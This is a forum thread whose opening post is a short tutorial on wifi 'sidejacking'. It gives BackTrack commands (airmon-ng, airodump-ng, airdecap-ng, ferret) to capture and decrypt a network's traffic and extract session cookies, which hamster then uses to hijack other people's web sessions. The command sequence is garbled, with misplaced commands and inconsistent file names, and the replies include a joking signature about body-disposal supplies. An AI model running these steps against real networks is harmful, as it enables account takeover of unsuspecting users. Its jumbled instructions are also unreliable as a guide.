using windows
http://rmccurdy.com/scripts/videos/rmccurdy_com/ sidejacking_hamster.swf
Just a quick and easy sidejacking tutorial for you.
Start Monitor mode on your selected Wifi Card.
Now start your traffic capture.Code:bt ~ # airmon-ng start wlan0
Now visit a few websites, maybe http://www.aircrack-ng.org to read up on the commands.Code:bt ~ # airodump-ng -w dump --bssid 00:11:22:33:44:55 --channel 01 wlan0
Once you have captured your traffic you can now start to decrypt it. For WEP use
Now you should have your "dump" file decrypted. Look for an file withCode:bt ~ # airdecap-ng -l -w <WEP Passphrase> dump-01.capin our senario it will beCode:*.dec.cap
Now pass your file to FerretCode:bt ~ # dump-01.dec.cap
which will create a new file calledCode:bt ~ # ferret -r dump-01-dec.cap
Now you have hamster.txt , http://www.google.com is your friend.Code:bt ~ # hamster.txt
regards
using windows
http://rmccurdy.com/scripts/videos/rmccurdy_com/ sidejacking_hamster.swf
Too bad hamster is windows only for now.
Nothing to stop you using a cookie cutter.
I have been deliberately vague to encourage the use of google more & research![]()
True, there are other tools one can use. And I think it's nice to see someone who wants people to read, try and learn on their own![]()
Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69
And today I've learned that linux ferret != windows ferret. Time to get some sleep as well, I think, and start fresh tomorrow.